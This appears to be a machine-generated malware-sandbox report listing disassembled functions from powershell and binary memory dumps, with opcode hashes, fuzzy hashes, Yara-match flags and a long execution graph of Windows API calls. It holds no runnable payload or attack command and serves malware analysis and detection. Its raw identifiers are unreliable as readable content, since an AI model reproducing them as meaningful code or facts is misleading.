                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f0b83f2baaa0d1927354afac4c6fe0e3a13af3dfe05f1a7a885ddd01d31d4b64
                                                                                        • Instruction ID: 3e376e4264c819886160e7a5ae580ebe2578dfe782626858d7e22aa7299ce17f
                                                                                        • Opcode Fuzzy Hash: f0b83f2baaa0d1927354afac4c6fe0e3a13af3dfe05f1a7a885ddd01d31d4b64
                                                                                        • Instruction Fuzzy Hash: D921387080C78C4FEB098BA888496F97FE4EB52321F04816FD489DB193DA795846CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848F34675 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d0e3361d74d2ee27645d0f2256e5238b1b89f9cb8af1d851f9524dd22a4e15d4
                                                                                        • Instruction ID: da0ab9a792387c2c004f979605ca81458b013f9dbe94d995e4fec795a793a81b
                                                                                        • Opcode Fuzzy Hash: d0e3361d74d2ee27645d0f2256e5238b1b89f9cb8af1d851f9524dd22a4e15d4
                                                                                        • Instruction Fuzzy Hash: 1901677111CB0C4FD744EF4CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848F3AE68 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f7986efcef492a43f845e269457951a10d8592f5f2a7952b6dfe3bd241820851
                                                                                        • Instruction ID: 4be3acdb558113d00afa57db441470d60f58329ae2bc27487d9c48a561804c87
                                                                                        • Opcode Fuzzy Hash: f7986efcef492a43f845e269457951a10d8592f5f2a7952b6dfe3bd241820851
                                                                                        • Instruction Fuzzy Hash: 47F0963180CA898FDB06AF2488555D97FA0FF16350F0502DBD458C70B2DB759598CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF849004CCA Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2084036128.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 46cb4bb16b60e4a2483eadfb4c6f636df5d8f34be52a362f3a2d88bdbdfb4582
                                                                                        • Instruction ID: dcec76ead6cf07a09e72f9da91a4bd0ea61443a275f8b1f359c515f21cbd28a1
                                                                                        • Opcode Fuzzy Hash: 46cb4bb16b60e4a2483eadfb4c6f636df5d8f34be52a362f3a2d88bdbdfb4582
                                                                                        • Instruction Fuzzy Hash: C9F0903190D5858FDB54EF5CB4459A477E0FF05360B0500F6E05DC7063EA25EC50C759
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF8490053E4 Relevance: .0, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2084036128.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 393054673aaac17d236322916cb3243088f6af9ee1bab0532926767c94a3d112
                                                                                        • Instruction ID: c70b592fd9fa301b2328f6de6db466d1846c87152b1aba27e2c41489159abbba
                                                                                        • Opcode Fuzzy Hash: 393054673aaac17d236322916cb3243088f6af9ee1bab0532926767c94a3d112
                                                                                        • Instruction Fuzzy Hash: FBF0373171CF044FD744EE1DD445665B7D1FBA8355F10452FE44DC3651DB25E4818786
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00007FF848F352FA Relevance: 14.5, Strings: 11, Instructions: 772COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "I$0"I$8"I$@"I$P"I$X"I$`"I$h"I$x"I$"I$"I
                                                                                        • API String ID: 0-2863176668
                                                                                        • Opcode ID: bf1d09415bfc6946bb80d8cdddb831585765383dd1766dedd6b20d5c80a7ddce
                                                                                        • Instruction ID: cc7192cf01e09a4c3887d68aed2bdd81a9f90c1b9171c5296d3a8b76e62c852f
                                                                                        • Opcode Fuzzy Hash: bf1d09415bfc6946bb80d8cdddb831585765383dd1766dedd6b20d5c80a7ddce
                                                                                        • Instruction Fuzzy Hash: C922E563F0EDC24FE26527BC3C161B92BA1FFD66A1B4902F7C148470DF5929AD0642CA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        Function 00007FF7C87F14B0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2224902891.00007FF7C87F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C87F0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2224865585.00007FF7C87F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2225609775.00007FF7C8D79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2225628244.00007FF7C8D82000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2225710135.00007FF7C8D85000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2225729864.00007FF7C8D86000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7c87f0000_m.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4004354ba9eaea3172bc7ecdf0289a0e6348fe9df046a5722f142659b5a62597
                                                                                        • Instruction ID: c95c0960fa9f226abc89712c7ac0fbbf279e4fcd678eaf33d5fd907b796f69bb
                                                                                        • Opcode Fuzzy Hash: 4004354ba9eaea3172bc7ecdf0289a0e6348fe9df046a5722f142659b5a62597
                                                                                        • Instruction Fuzzy Hash: 8BB0123090430988E3013F43E841258F3207B0DB60FC24030D80C13392CF7D90404739
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:5.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:1.4%
                                                                                        Total number of Nodes:1101
                                                                                        Total number of Limit Nodes:9
                                                                                        execution_graph 10802 7ff6b29866d8 wcscat 10803 7ff6b2995483 10802->10803 10303 7ff6b29811e0 10305 7ff6b2980e9c 10303->10305 10304 7ff6b2981277 10305->10303 10305->10304 10307 7ff6b29806e0 10305->10307 10310 7ff6b29806ff 10307->10310 10308 7ff6b2980806 10308->10305 10310->10308 10312 7ff6b297f6c0 10310->10312 10319 7ff6b297f3e0 10310->10319 10313 7ff6b297f760 10312->10313 10316 7ff6b297f6da 10312->10316 10328 7ff6b29863e0 ___mb_cur_max_func ___lc_codepage_func 10313->10328 10314 7ff6b297f745 10314->10310 10316->10314 10324 7ff6b2986130 10316->10324 10318 7ff6b297f713 10318->10310 10320 7ff6b2986130 2 API calls 10319->10320 10323 7ff6b297f40d 10320->10323 10321 7ff6b297f480 10321->10310 10322 7ff6b2986130 2 API calls 10322->10323 10323->10321 10323->10322 10325 7ff6b298614d 10324->10325 10331 7ff6b29860b0 10325->10331 10327 7ff6b2986165 10327->10318 10336 7ff6b2986270 10328->10336 10330 7ff6b298643b 10330->10316 10332 7ff6b29860d4 WideCharToMultiByte 10331->10332 10333 7ff6b29860c1 10331->10333 10332->10333 10334 7ff6b298611a _errno 10332->10334 10333->10334 10335 7ff6b29860c8 10333->10335 10334->10327 10335->10327 10337 7ff6b29863a3 10336->10337 10340 7ff6b2986285 10336->10340 10337->10330 10338 7ff6b2986341 10338->10330 10339 7ff6b2986324 10341 7ff6b2986370 MultiByteToWideChar 10339->10341 10342 7ff6b298632f 10339->10342 10340->10338 10340->10339 10343 7ff6b29862b9 IsDBCSLeadByteEx 10340->10343 10344 7ff6b29862d4 10340->10344 10341->10338 10346 7ff6b29863b3 _errno 10341->10346 10342->10330 10343->10339 10343->10344 10344->10338 10345 7ff6b29862fe MultiByteToWideChar 10344->10345 10345->10346 10347 7ff6b2986318 10345->10347 10346->10338 10347->10330 10348 7ff6b29831e8 10349 7ff6b29831f4 10348->10349 10350 7ff6b29838ef wcslen 10349->10350 10351 7ff6b298321c 10349->10351 10354 7ff6b2981900 10351->10354 10353 7ff6b2983234 10355 7ff6b298191a 10354->10355 10356 7ff6b2981a2a fwprintf 10355->10356 10357 7ff6b2981a61 fwprintf 10355->10357 10358 7ff6b298193d 10355->10358 10356->10358 10357->10358 10358->10353 10807 7ff6b29810f5 10808 7ff6b2980f4c 10807->10808 10809 7ff6b298110a 10807->10809 10808->10807 10813 7ff6b2980030 10808->10813 10811 7ff6b2980030 13 API calls 10809->10811 10812 7ff6b2981124 10811->10812 10812->10812 10814 7ff6b2980044 10813->10814 10815 7ff6b298007b 10814->10815 10817 7ff6b29800b0 10814->10817 10816 7ff6b297ff50 8 API calls 10815->10816 10818 7ff6b298008a 10816->10818 10820 7ff6b2983b40 5 API calls 10817->10820 10819 7ff6b2983b40 5 API calls 10818->10819 10821 7ff6b2980092 10819->10821 10822 7ff6b29800c7 10820->10822 10821->10808 10822->10808 10359 7ff6b29761f0 10360 7ff6b297623a 10359->10360 10362 7ff6b2976203 10359->10362 10361 7ff6b29762f9 strcmp 10361->10360 10362->10360 10362->10361 10363 7ff6b29835f0 10364 7ff6b29835f9 10363->10364 10365 7ff6b2983888 10363->10365 10366 7ff6b2981900 2 API calls 10364->10366 10367 7ff6b2983623 10364->10367 10366->10367 10368 7ff6b2983df0 10369 7ff6b2983df9 10368->10369 10413 7ff6b29855c0 10369->10413 10371 7ff6b2983e0e 10372 7ff6b2983d40 10371->10372 10378 7ff6b2983eaf 10371->10378 10403 7ff6b29856c0 10372->10403 10376 7ff6b29842b9 10377 7ff6b2983a80 6 API calls 10392 7ff6b29840bf 10377->10392 10378->10376 10379 7ff6b29842d1 10378->10379 10380 7ff6b2984080 10378->10380 10378->10392 10379->10377 10379->10392 10420 7ff6b2983a80 10380->10420 10382 7ff6b29847c0 10383 7ff6b29856c0 5 API calls 10384 7ff6b2984584 10383->10384 10387 7ff6b29856c0 5 API calls 10384->10387 10391 7ff6b2984270 10384->10391 10385 7ff6b29856c0 5 API calls 10388 7ff6b2983d70 10385->10388 10386 7ff6b298453d 10386->10382 10386->10383 10387->10391 10389 7ff6b29857f0 6 API calls 10389->10392 10390 7ff6b2985950 10 API calls 10390->10392 10391->10385 10392->10382 10392->10386 10392->10389 10392->10390 10392->10391 10393 7ff6b2984521 10392->10393 10396 7ff6b2985ae0 7 API calls 10392->10396 10397 7ff6b29855c0 6 API calls 10392->10397 10399 7ff6b2985730 8 API calls 10392->10399 10402 7ff6b29856c0 Sleep InitializeCriticalSection InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 10392->10402 10424 7ff6b2985820 10392->10424 10435 7ff6b2985c10 10392->10435 10393->10382 10428 7ff6b2985730 10393->10428 10396->10392 10398 7ff6b2985056 memcpy 10397->10398 10442 7ff6b2985ae0 10398->10442 10399->10392 10402->10392 10404 7ff6b29856cd 10403->10404 10405 7ff6b2983d48 10403->10405 10448 7ff6b29854a0 10404->10448 10409 7ff6b2983ab0 10405->10409 10408 7ff6b2985710 LeaveCriticalSection 10410 7ff6b2983ac3 10409->10410 10411 7ff6b29855c0 6 API calls 10410->10411 10412 7ff6b2983ae4 10411->10412 10412->10388 10414 7ff6b29854a0 4 API calls 10413->10414 10417 7ff6b29855cf 10414->10417 10415 7ff6b29855d4 malloc 10416 7ff6b2985601 10415->10416 10419 7ff6b2985610 10415->10419 10418 7ff6b2985643 LeaveCriticalSection 10416->10418 10416->10419 10417->10415 10417->10416 10418->10419 10419->10371 10421 7ff6b2983a8c 10420->10421 10422 7ff6b29855c0 6 API calls 10421->10422 10423 7ff6b2983aa4 10422->10423 10423->10392 10425 7ff6b2985841 10424->10425 10426 7ff6b29855c0 6 API calls 10425->10426 10427 7ff6b2985867 10426->10427 10427->10392 10429 7ff6b2985750 10428->10429 10430 7ff6b29855c0 6 API calls 10429->10430 10434 7ff6b298577b 10429->10434 10431 7ff6b29857ab 10430->10431 10432 7ff6b29857b3 memcpy 10431->10432 10431->10434 10433 7ff6b29856c0 5 API calls 10432->10433 10433->10434 10434->10386 10436 7ff6b2985c2d 10435->10436 10437 7ff6b2985c5b 10435->10437 10436->10437 10439 7ff6b2985d60 10436->10439 10438 7ff6b29855c0 6 API calls 10437->10438 10441 7ff6b2985c69 10438->10441 10440 7ff6b29855c0 6 API calls 10439->10440 10440->10441 10441->10392 10443 7ff6b2985b0f 10442->10443 10444 7ff6b29855c0 6 API calls 10443->10444 10447 7ff6b2985b1e 10444->10447 10445 7ff6b2985bb0 10445->10392 10446 7ff6b29856c0 5 API calls 10446->10445 10447->10445 10447->10446 10449 7ff6b2985520 EnterCriticalSection 10448->10449 10451 7ff6b29854b4 10448->10451 10450 7ff6b29854b8 10449->10450 10450->10449 10453 7ff6b29854db 10450->10453 10454 7ff6b29854c4 Sleep 10450->10454 10451->10450 10452 7ff6b29854f1 InitializeCriticalSection InitializeCriticalSection 10451->10452 10452->10450 10453->10405 10453->10408 10454->10450 10454->10454 10823 7ff6b2980cf0 10824 7ff6b2980d0c 10823->10824 10825 7ff6b2981145 10823->10825 10830 7ff6b297fba0 10824->10830 10827 7ff6b297fba0 13 API calls 10825->10827 10828 7ff6b298115f 10827->10828 10829 7ff6b2980bc4 10831 7ff6b297fbb4 10830->10831 10832 7ff6b297fbf4 10831->10832 10833 7ff6b297fc30 10831->10833 10834 7ff6b297f7c0 8 API calls 10832->10834 10836 7ff6b2983b40 5 API calls 10833->10836 10835 7ff6b297fc03 10834->10835 10838 7ff6b2983b40 5 API calls 10835->10838 10837 7ff6b297fc47 10836->10837 10837->10829 10839 7ff6b297fc27 10838->10839 10839->10829 10843 7ff6b297e6f0 GetCurrentThreadId 10844 7ff6b297e70f 10843->10844 10845 7ff6b29830ee 10846 7ff6b29835a7 10845->10846 10849 7ff6b29830e4 10845->10849 10848 7ff6b2981900 2 API calls 10846->10848 10847 7ff6b2981650 10 API calls 10847->10849 10850 7ff6b29835c8 10848->10850 10849->10845 10849->10847 10455 7ff6b29867b9 EnterCriticalSection 10851 7ff6b29830b7 10852 7ff6b29831f4 10851->10852 10853 7ff6b29830d4 10851->10853 10854 7ff6b298321c 10852->10854 10855 7ff6b29838ef wcslen 10852->10855 10864 7ff6b2981e60 10853->10864 10857 7ff6b2981900 2 API calls 10854->10857 10858 7ff6b2983234 10857->10858 10865 7ff6b2981e85 10864->10865 10866 7ff6b2981ea0 strlen 10864->10866 10865->10866 10866->10865 10867 7ff6b29786c3 10868 7ff6b2977e20 10867->10868 10869 7ff6b29786d3 10867->10869 10870 7ff6b29746e0 _errno 10869->10870 10871 7ff6b297a1cd strlen 10870->10871 10871->10868 10872 7ff6b29810c2 10873 7ff6b29810d2 10872->10873 10874 7ff6b297f3e0 2 API calls 10873->10874 10875 7ff6b29810f0 10874->10875 10876 7ff6b2987ac0 10879 7ff6b29879a0 10876->10879 10880 7ff6b2987d70 strcmp 10879->10880 10881 7ff6b29879b1 10880->10881 10882 7ff6b29798cd 10884 7ff6b2979917 10882->10884 10883 7ff6b2977e20 10884->10883 10886 7ff6b297bf60 10884->10886 10887 7ff6b297bf88 10886->10887 10895 7ff6b297bf7d 10886->10895 10888 7ff6b297bf9b 10887->10888 10889 7ff6b297c038 10887->10889 10890 7ff6b297bfa8 10888->10890 10893 7ff6b297c100 10888->10893 10891 7ff6b297bbe0 2 API calls 10889->10891 10896 7ff6b297bbe0 10890->10896 10891->10895 10894 7ff6b297bbe0 2 API calls 10893->10894 10894->10895 10895->10883 10897 7ff6b297bc04 10896->10897 10898 7ff6b297bc10 10896->10898 10897->10895 10898->10897 10899 7ff6b297bd4f 10898->10899 10900 7ff6b297bd73 10898->10900 10904 7ff6b297bcac 10898->10904 10909 7ff6b297b8c0 10899->10909 10902 7ff6b297bf60 _errno 10900->10902 10903 7ff6b297bd83 10902->10903 10903->10895 10905 7ff6b297bda7 10904->10905 10906 7ff6b29746e0 _errno 10904->10906 10905->10895 10907 7ff6b297be6e strlen 10906->10907 10908 7ff6b297be85 10907->10908 10910 7ff6b297b928 10909->10910 10911 7ff6b297bbe0 2 API calls 10910->10911 10459 7ff6b29833c9 10460 7ff6b29833f0 10459->10460 10461 7ff6b2983403 10459->10461 10465 7ff6b2982440 10460->10465 10463 7ff6b2982440 18 API calls 10461->10463 10464 7ff6b2983799 10463->10464 10464->10464 10466 7ff6b2982454 10465->10466 10467 7ff6b298248b 10466->10467 10468 7ff6b29824c0 10466->10468 10477 7ff6b2982360 10467->10477 10481 7ff6b29817e0 10468->10481 10478 7ff6b2982396 10477->10478 10478->10478 10491 7ff6b2981a80 10478->10491 10480 7ff6b2982401 10482 7ff6b29817f4 10481->10482 10504 7ff6b2981650 10482->10504 10484 7ff6b298182e 10485 7ff6b2983b40 10484->10485 10486 7ff6b29856c0 10485->10486 10487 7ff6b29824d7 10486->10487 10488 7ff6b29854a0 4 API calls 10486->10488 10487->10461 10489 7ff6b29856e7 10488->10489 10489->10487 10490 7ff6b2985710 LeaveCriticalSection 10489->10490 10493 7ff6b2981aa2 10491->10493 10492 7ff6b2981c32 10498 7ff6b2981c51 10492->10498 10500 7ff6b2981880 10492->10500 10493->10492 10495 7ff6b2981d30 10493->10495 10496 7ff6b2981b1b 10493->10496 10497 7ff6b2981880 7 API calls 10495->10497 10495->10498 10496->10492 10499 7ff6b2981900 2 API calls 10496->10499 10497->10498 10498->10480 10499->10496 10501 7ff6b29818b0 localeconv 10500->10501 10503 7ff6b298188f 10500->10503 10502 7ff6b29863e0 6 API calls 10501->10502 10502->10503 10503->10498 10505 7ff6b298166c 10504->10505 10506 7ff6b2981775 10504->10506 10505->10506 10515 7ff6b298168f 10505->10515 10507 7ff6b29817ba fwprintf 10506->10507 10508 7ff6b2981788 10506->10508 10511 7ff6b29817a1 10507->10511 10509 7ff6b2981795 fwprintf 10508->10509 10510 7ff6b29817ce fwprintf 10508->10510 10509->10511 10510->10511 10511->10484 10512 7ff6b29816cb strlen 10514 7ff6b29863e0 6 API calls 10512->10514 10513 7ff6b29816a9 10513->10484 10514->10515 10515->10512 10515->10513 10912 7ff6b29882d3 10923 7ff6b2988330 10912->10923 10914 7ff6b29882db 10915 7ff6b2988330 16 API calls 10914->10915 10916 7ff6b29882e0 10915->10916 10917 7ff6b29882e8 10916->10917 10931 7ff6b297eb70 RtlCaptureContext RtlUnwindEx abort 10916->10931 10932 7ff6b29884d0 10917->10932 10924 7ff6b2988339 10923->10924 10925 7ff6b2988366 10924->10925 10926 7ff6b2987ff0 16 API calls 10924->10926 10925->10914 10927 7ff6b29883b1 10926->10927 10928 7ff6b29883f0 10927->10928 10937 7ff6b2987410 10927->10937 10933 7ff6b29884da 10932->10933 10934 7ff6b2987ff0 16 API calls 10933->10934 10936 7ff6b2988150 16 API calls 10933->10936 10946 7ff6b297ec20 10933->10946 10934->10933 10936->10933 10944 7ff6b298742c 10937->10944 10938 7ff6b297e5a0 WaitForSingleObject 10938->10944 10939 7ff6b2987564 10941 7ff6b29878c0 16 API calls 10939->10941 10940 7ff6b2987513 10940->10914 10943 7ff6b2987569 10941->10943 10942 7ff6b297e610 ReleaseSemaphore 10942->10944 10944->10938 10944->10939 10944->10940 10944->10942 10945 7ff6b29878f0 16 API calls 10944->10945 10945->10944 10947 7ff6b297ec2b 10946->10947 10948 7ff6b297ec35 10946->10948 10952 7ff6b297eb20 RaiseException 10947->10952 10951 7ff6b297ec30 abort 10948->10951 10953 7ff6b297e7b0 RaiseException 10948->10953 10951->10948 10952->10951 10954 7ff6b297e7f9 10953->10954 10954->10948 10516 7ff6b2980fd5 10517 7ff6b2981004 10516->10517 10518 7ff6b2980ff1 10516->10518 10520 7ff6b29800d0 15 API calls 10517->10520 10522 7ff6b29800d0 10518->10522 10521 7ff6b2981193 10520->10521 10521->10521 10523 7ff6b29800e9 10522->10523 10524 7ff6b29801f4 10523->10524 10525 7ff6b2980124 10523->10525 10531 7ff6b2983b40 5 API calls 10524->10531 10526 7ff6b2980190 10525->10526 10529 7ff6b2980138 10525->10529 10527 7ff6b298019f 10526->10527 10528 7ff6b2980194 strlen 10526->10528 10551 7ff6b297ff50 10527->10551 10528->10527 10530 7ff6b2980214 strlen 10529->10530 10533 7ff6b2980140 10529->10533 10530->10533 10532 7ff6b298020b 10531->10532 10532->10517 10542 7ff6b297f7c0 10533->10542 10538 7ff6b2980157 10540 7ff6b2983b40 5 API calls 10538->10540 10541 7ff6b2980182 10540->10541 10541->10517 10544 7ff6b297f7e2 10542->10544 10543 7ff6b297f972 10545 7ff6b297f6c0 8 API calls 10543->10545 10549 7ff6b297f991 10543->10549 10544->10543 10546 7ff6b297f85b 10544->10546 10547 7ff6b297fa70 10544->10547 10545->10549 10546->10543 10550 7ff6b297f3e0 2 API calls 10546->10550 10548 7ff6b297f6c0 8 API calls 10547->10548 10547->10549 10548->10549 10549->10538 10550->10546 10552 7ff6b297ff86 10551->10552 10553 7ff6b297f7c0 8 API calls 10552->10553 10554 7ff6b297fff1 10553->10554 10555 7ff6b297ddd5 10556 7ff6b297ddf9 10555->10556 10557 7ff6b297de04 10555->10557 10557->10556 10558 7ff6b297de1b EnterCriticalSection LeaveCriticalSection 10557->10558 10559 7ff6b29733d0 wcslen 10560 7ff6b297347c 10559->10560 10561 7ff6b29734c3 10560->10561 10562 7ff6b2973480 wcslen 10560->10562 10562->10561 10955 7ff6b29714d0 10956 7ff6b2971180 84 API calls 10955->10956 10957 7ff6b29714e6 10956->10957 10958 7ff6b2972cd0 10959 7ff6b2972ba0 4 API calls 10958->10959 10960 7ff6b2972d02 10959->10960 10964 7ff6b297e4d0 TlsFree 10965 7ff6b297e4e8 GetLastError 10964->10965 10966 7ff6b297e4de 10964->10966 10563 7ff6b2978a25 10566 7ff6b2978a40 10563->10566 10567 7ff6b297a284 10566->10567 10568 7ff6b29746e0 10566->10568 10571 7ff6b297f250 10568->10571 10574 7ff6b2980b20 _errno 10571->10574 10573 7ff6b2974704 strlen 10573->10566 10575 7ff6b2980bc4 10574->10575 10575->10573 10967 7ff6b2986721 TlsGetValue 10576 7ff6b2987c20 10577 7ff6b2987c36 10576->10577 10579 7ff6b2987c82 10577->10579 10580 7ff6b2987d70 10577->10580 10581 7ff6b2987da2 10580->10581 10582 7ff6b2987d7e 10580->10582 10581->10577 10582->10581 10583 7ff6b2987d89 strcmp 10582->10583 10583->10581 10584 7ff6b297e420 10585 7ff6b297e439 10584->10585 10586 7ff6b297e42e 10584->10586 10586->10585 10587 7ff6b297e460 Sleep 10586->10587 10587->10585 10587->10587 10971 7ff6b2973930 10974 7ff6b2972ed0 10971->10974 10973 7ff6b2973946 10975 7ff6b2972ba0 4 API calls 10974->10975 10976 7ff6b2972f02 10975->10976 10976->10973 10588 7ff6b2987a30 10589 7ff6b2987a80 10588->10589 10592 7ff6b2987a55 10588->10592 10591 7ff6b2987d70 strcmp 10589->10591 10590 7ff6b2987d70 strcmp 10593 7ff6b2987a5d 10590->10593 10591->10592 10592->10590 10594 7ff6b2987a98 10592->10594 10977 7ff6b297e530 TlsSetValue 10978 7ff6b297e548 GetLastError 10977->10978 10979 7ff6b297e53e 10977->10979 10980 7ff6b2981130 10981 7ff6b2980d0c 10980->10981 10982 7ff6b2981145 10980->10982 10983 7ff6b297fba0 13 API calls 10981->10983 10984 7ff6b297fba0 13 API calls 10982->10984 10986 7ff6b2980bc4 10983->10986 10985 7ff6b298115f 10984->10985 10987 7ff6b2980f30 10988 7ff6b2980f4c 10987->10988 10989 7ff6b298110a 10987->10989 10988->10989 10990 7ff6b2980030 13 API calls 10988->10990 10991 7ff6b2980030 13 API calls 10989->10991 10990->10988 10992 7ff6b2981124 10991->10992 10992->10992 10993 7ff6b29834fd strerror 10994 7ff6b2981e60 strlen 10993->10994 10995 7ff6b2983511 10994->10995 10995->10995 10595 7ff6b2978c05 10596 7ff6b2977e20 10595->10596 10603 7ff6b2978c12 10595->10603 10597 7ff6b297aa56 10605 7ff6b2974830 strlen 10597->10605 10598 7ff6b2978c64 strcmp 10598->10603 10600 7ff6b297aa94 10601 7ff6b2978c9d strcmp 10602 7ff6b2978cbf strcmp 10601->10602 10601->10603 10602->10603 10604 7ff6b297aee7 10602->10604 10603->10596 10603->10597 10603->10598 10603->10601 10604->10604 10606 7ff6b297484b 10605->10606 10606->10600 10999 7ff6b297e500 GetLastError TlsGetValue SetLastError 11000 7ff6b2986b00 11001 7ff6b2986b36 11000->11001 11004 7ff6b2986b0a 11000->11004 11002 7ff6b2986ca0 16 API calls 11001->11002 11002->11004 11003 7ff6b2986b30 11004->11003 11005 7ff6b2987410 16 API calls 11004->11005 11006 7ff6b2988428 11005->11006 11007 7ff6b2987700 11008 7ff6b2987806 11007->11008 11009 7ff6b2987714 11007->11009 11010 7ff6b2987811 fwrite abort 11008->11010 11014 7ff6b2988150 16 API calls 11008->11014 11017 7ff6b2987801 abort 11008->11017 11018 7ff6b2988330 16 API calls 11008->11018 11022 7ff6b2987851 fwrite 11008->11022 11011 7ff6b29877dc fwrite 11009->11011 11012 7ff6b2987729 11009->11012 11010->11008 11011->11017 11031 7ff6b297d110 11012->11031 11014->11008 11017->11008 11018->11008 11020 7ff6b2987797 11023 7ff6b29877cf fputs 11020->11023 11026 7ff6b298779e fwrite 11020->11026 11030 7ff6b29884d0 16 API calls 11020->11030 11021 7ff6b298778a fputs 11021->11020 11025 7ff6b2987872 fputs 11022->11025 11023->11020 11027 7ff6b2987884 fputc 11025->11027 11026->11020 11028 7ff6b29877c0 free 11026->11028 11029 7ff6b2988330 16 API calls 11027->11029 11028->11020 11029->11008 11030->11020 11032 7ff6b297d12c 11031->11032 11038 7ff6b297d1be fwrite 11031->11038 11032->11038 11041 7ff6b297c2f0 11032->11041 11034 7ff6b297d165 11035 7ff6b297d16d 11034->11035 11036 7ff6b297d240 free 11034->11036 11037 7ff6b297d192 strlen 11035->11037 11035->11038 11036->11038 11039 7ff6b297d1a4 memcpy free 11037->11039 11040 7ff6b297d220 free 11037->11040 11038->11020 11038->11021 11039->11038 11040->11038 11042 7ff6b297c321 strncmp 11041->11042 11046 7ff6b297c341 11041->11046 11042->11046 11043 7ff6b297c43b strlen 11044 7ff6b297c72d 11043->11044 11043->11046 11044->11034 11045 7ff6b297c3a1 strlen 11045->11046 11046->11042 11046->11043 11046->11044 11046->11045 11047 7ff6b297c403 strlen 11046->11047 11047->11046 11048 7ff6b2986709 VirtualQuery 11049 7ff6b2995354 11048->11049 10607 7ff6b2971010 10609 7ff6b297104b 10607->10609 10608 7ff6b297106d __set_app_type 10610 7ff6b2971077 10608->10610 10609->10608 10609->10610 10611 7ff6b2974610 10612 7ff6b2974670 10611->10612 10616 7ff6b2974637 10611->10616 10613 7ff6b2974661 10612->10613 10615 7ff6b2974688 realloc 10612->10615 10614 7ff6b297463e memcpy 10614->10613 10615->10616 10617 7ff6b29746b5 free 10615->10617 10616->10613 10616->10614 10617->10613 11050 7ff6b2983311 11051 7ff6b29833c4 11050->11051 11054 7ff6b2983338 11050->11054 11053 7ff6b2983839 11051->11053 11055 7ff6b29839c5 11051->11055 11052 7ff6b29817e0 10 API calls 11052->11053 11053->11052 11054->11053 11054->11055 11056 7ff6b2983a47 11054->11056 11061 7ff6b2982650 11054->11061 11057 7ff6b29817e0 10 API calls 11055->11057 11058 7ff6b29817e0 10 